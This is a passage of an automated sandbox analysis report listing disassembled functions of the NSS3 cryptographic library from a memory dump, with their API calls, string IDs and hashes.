                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CFA1EEF
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CFA1F17
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFA1F34
                                                                                • PR_SetLogBuffering.NSS3(00004000), ref: 6CFA1F61
                                                                                • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CFA1F6E
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CFA1F83
                                                                                • PR_SetLogFile.NSS3(00000000), ref: 6CFA1FA2
                                                                                • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CFA1FB8
                                                                                • OutputDebugStringA.KERNEL32(00000000), ref: 6CFA1FCB
                                                                                • free.MOZGLUE(00000000), ref: 6CFA1FD2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                • API String ID: 2013311973-4000297177
                                                                                • Opcode ID: 77145d7b2b1a75fea201d78a03dc96bfd0423af43c298f54d7db8ac2af1fce05
                                                                                • Instruction ID: 7c50483360ac13b026c5e0423e5194e5c0f6f1862d990d6614cdcf77ade400bc
                                                                                • Opcode Fuzzy Hash: 77145d7b2b1a75fea201d78a03dc96bfd0423af43c298f54d7db8ac2af1fce05
                                                                                • Instruction Fuzzy Hash: FD51CEB1D04249DFEF00DBE5DD48B9EBBB8AF05308F098128E919DB641E7B1E549CB91
                                                                                Function 6D014C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014C50
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014C5B
                                                                                • PR_smprintf.NSS3(6D0EAAF9,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014C76
                                                                                • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014CAE
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D014CC9
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D014CF4
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D014D0B
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014D5E
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014D68
                                                                                • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6D014D85
                                                                                • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6D014DA2
                                                                                • free.MOZGLUE(?), ref: 6D014DB9
                                                                                • free.MOZGLUE(00000000), ref: 6D014DCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                • API String ID: 3756394533-2552752316
                                                                                • Opcode ID: 9d11df9e9acad05f1f8405cedb3bbda0e72f11c2590297277c7c40f8354771dc
                                                                                • Instruction ID: fcdc138dddd258821c4d1f98b578996936b00a99fc4aa439d449deec39433086
                                                                                • Opcode Fuzzy Hash: 9d11df9e9acad05f1f8405cedb3bbda0e72f11c2590297277c7c40f8354771dc
                                                                                • Instruction Fuzzy Hash: 4E418CB1D04142BBFF125F949C40BBE3AA5AF9A34CF454128E81A5B355EB71D814C7E3
                                                                                Function 6CFBDDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFBDDDE
                                                                                  • Part of subcall function 6D010FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CFB87ED,00000800,6CFAEF74,00000000), ref: 6D011000
                                                                                  • Part of subcall function 6D010FF0: PR_NewLock.NSS3(?,00000800,6CFAEF74,00000000), ref: 6D011016
                                                                                  • Part of subcall function 6D010FF0: PL_InitArenaPool.NSS3(00000000,security,6CFB87ED,00000008,?,00000800,6CFAEF74,00000000), ref: 6D01102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CFBDDF5
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CFBDE34
                                                                                • PR_Now.NSS3 ref: 6CFBDE93
                                                                                • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CFBDE9D
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFBDEB4
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CFBDEC3
                                                                                • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CFBDED8
                                                                                • PR_smprintf.NSS3(%s%s,?,?), ref: 6CFBDEF0
                                                                                • PR_smprintf.NSS3(6D0EAAF9,(NULL) (Validity Unknown)), ref: 6CFBDF04
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFBDF13
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CFBDF22
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CFBDF33
                                                                                • free.MOZGLUE(00000000), ref: 6CFBDF3C
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFBDF4B
                                                                                • free.MOZGLUE(00000000), ref: 6CFBDF74
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFBDF8E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                • API String ID: 1882561532-3437882492
                                                                                • Opcode ID: 9afb6934a47a78e47b6b582ee8c4c0d44783f405deb2a5ea455ade718a4d6ae3
                                                                                • Instruction ID: 1f9908d81da5e76bda815d11954d53470afe8c0c4fd6e628f21f8bf355f6fe4d
                                                                                • Opcode Fuzzy Hash: 9afb6934a47a78e47b6b582ee8c4c0d44783f405deb2a5ea455ade718a4d6ae3
                                                                                • Instruction Fuzzy Hash: 4D51A0B2E052059BEB10DE669C41BAF7AB9AF95358F154028E809F7705E731D910CBE3
                                                                                Function 6CFF2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CFF2DEC
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CFF2E00
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CFF2E2B
                                                                                • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CFF2E43
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CFC4F1C,?,-00000001,00000000,?), ref: 6CFF2E74
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CFC4F1C,?,-00000001,00000000), ref: 6CFF2E88
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFF2EC6
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFF2EE4
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFF2EF8
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF2F62
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF2F86
                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6CFF2F9E
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF2FCA
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF301A
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFF302E
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF3066
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFF3085
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF30EC
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF310C
                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6CFF3124
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF314C
                                                                                  • Part of subcall function 6CFD9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6D00379E,?,6CFD9568,00000000,?,6D00379E,?,00000001,?), ref: 6CFD918D
                                                                                  • Part of subcall function 6CFD9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6D00379E,?,6CFD9568,00000000,?,6D00379E,?,00000001,?), ref: 6CFD91A0
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07AD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07CD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07D6
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF3204A), ref: 6CFA07E4
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,6CF3204A), ref: 6CFA0864
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CFA0880
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,6CF3204A), ref: 6CFA08CB
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08D7
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08FB
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFF316D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                • String ID:
                                                                                • API String ID: 3383223490-0
                                                                                • Opcode ID: 657af346893d00238fcdb8ef6cf18a0810f5e590e2c7ce007cdae9de858e2c5c
                                                                                • Instruction ID: aeb8764e7c1fd23ebe08e571f4b76a18d14db8ae21ba908ed3bb32e3b6e18e00
                                                                                • Opcode Fuzzy Hash: 657af346893d00238fcdb8ef6cf18a0810f5e590e2c7ce007cdae9de858e2c5c
                                                                                • Instruction Fuzzy Hash: 7AF19DB1C002099FEF00DFA4E844B9EBBB5FF09318F154169EC15A7721EB71A996CB91
                                                                                Function 6CFF6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CFF6943
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CFF6957
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CFF6972
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CFF6983
                                                                                  • Part of subcall function 6CFF6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CFF69AA
                                                                                  • Part of subcall function 6CFF6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CFF69BE
                                                                                  • Part of subcall function 6CFF6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CFF69D2
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CFF69DF
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CFF6A5B
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CFF6D8C
                                                                                • free.MOZGLUE(00000000), ref: 6CFF6DC5
                                                                                • free.MOZGLUE(?), ref: 6CFF6DD6
                                                                                • free.MOZGLUE(?), ref: 6CFF6DE7
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CFF6E1F
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFF6E4B
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFF6E72
                                                                                • free.MOZGLUE(?), ref: 6CFF6EA7
                                                                                • free.MOZGLUE(?), ref: 6CFF6EC4
                                                                                • free.MOZGLUE(?), ref: 6CFF6ED5
                                                                                • free.MOZGLUE(00000000), ref: 6CFF6EE3
                                                                                • free.MOZGLUE(?), ref: 6CFF6EF4
                                                                                • free.MOZGLUE(?), ref: 6CFF6F08
                                                                                • free.MOZGLUE(00000000), ref: 6CFF6F35
                                                                                • free.MOZGLUE(?), ref: 6CFF6F44
                                                                                • free.MOZGLUE(?), ref: 6CFF6F5B
                                                                                • free.MOZGLUE(00000000), ref: 6CFF6F65
                                                                                  • Part of subcall function 6CFF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CFF781D,00000000,6CFEBE2C,?,6CFF6B1D,?,?,?,?,00000000,00000000,6CFF781D), ref: 6CFF6C40
                                                                                  • Part of subcall function 6CFF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CFF781D,?,6CFEBE2C,?), ref: 6CFF6C58
                                                                                  • Part of subcall function 6CFF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CFF781D), ref: 6CFF6C6F
                                                                                  • Part of subcall function 6CFF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CFF6C84
                                                                                  • Part of subcall function 6CFF6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CFF6C96
                                                                                  • Part of subcall function 6CFF6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CFF6CAA
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFF6F90
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFF6FC5
                                                                                • PK11_GetInternalKeySlot.NSS3 ref: 6CFF6FF4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                • String ID:
                                                                                • API String ID: 1304971872-0
                                                                                • Opcode ID: 37f0bf5ea0421e457d8225abdd43a1366bffc2b1cd6113dc0042d87b4c7824f2
                                                                                • Instruction ID: f2b71072a684a8f461c91abaa03e5130d4b5d6ca4fb178cd83c8a33523a16c0e
                                                                                • Opcode Fuzzy Hash: 37f0bf5ea0421e457d8225abdd43a1366bffc2b1cd6113dc0042d87b4c7824f2
                                                                                • Instruction Fuzzy Hash: D0B16EB1E012099FEF00CBA5D845BDEBBB9EF05348F140124F825E7660EB71E916CB61
                                                                                Function 6CFF4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF4C4C
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFF4C60
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4CA1
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CFF4CBE
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4CD2
                                                                                • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4D3A
                                                                                • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4D4F
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4DB7
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07AD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07CD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07D6
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF3204A), ref: 6CFA07E4
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,6CF3204A), ref: 6CFA0864
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CFA0880
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,6CF3204A), ref: 6CFA08CB
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08D7
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08FB
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF4DD7
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFF4DEC
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF4E1B
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFF4E2F
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4E5A
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFF4E71
                                                                                • free.MOZGLUE(00000000), ref: 6CFF4E7A
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF4EA2
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF4EC1
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFF4ED6
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF4F01
                                                                                • free.MOZGLUE(00000000), ref: 6CFF4F2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                • String ID:
                                                                                • API String ID: 759471828-0
                                                                                • Opcode ID: 0616091fa3224ad47d5bac745922f79e4cc24cc4a2390a1a209263e7603a0bc2
                                                                                • Instruction ID: b8a9879e2d762e1f763a790b410372beca2c3aedcad8250cf87742807c4791fa
                                                                                • Opcode Fuzzy Hash: 0616091fa3224ad47d5bac745922f79e4cc24cc4a2390a1a209263e7603a0bc2
                                                                                • Instruction Fuzzy Hash: 23B1F275900205DFEB00DF68ED44BAA7BB4FF09318F054128ED2597B61EB71E962CBA1
                                                                                Function 6CFC5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC5DEC
                                                                                • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CFC5E0F
                                                                                • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CFC5E35
                                                                                • SECKEY_CopyPublicKey.NSS3(?), ref: 6CFC5E6A
                                                                                • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CFC5EC3
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CFC5ED9
                                                                                • SECKEY_SignatureLen.NSS3(?), ref: 6CFC5F09
                                                                                • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CFC5F49
                                                                                • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CFC5F89
                                                                                • free.MOZGLUE(?), ref: 6CFC5FA0
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC5FB6
                                                                                • free.MOZGLUE(00000000), ref: 6CFC5FBF
                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CFC600C
                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CFC6079
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFC6084
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFC6094
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                • String ID:
                                                                                • API String ID: 2310191401-3916222277
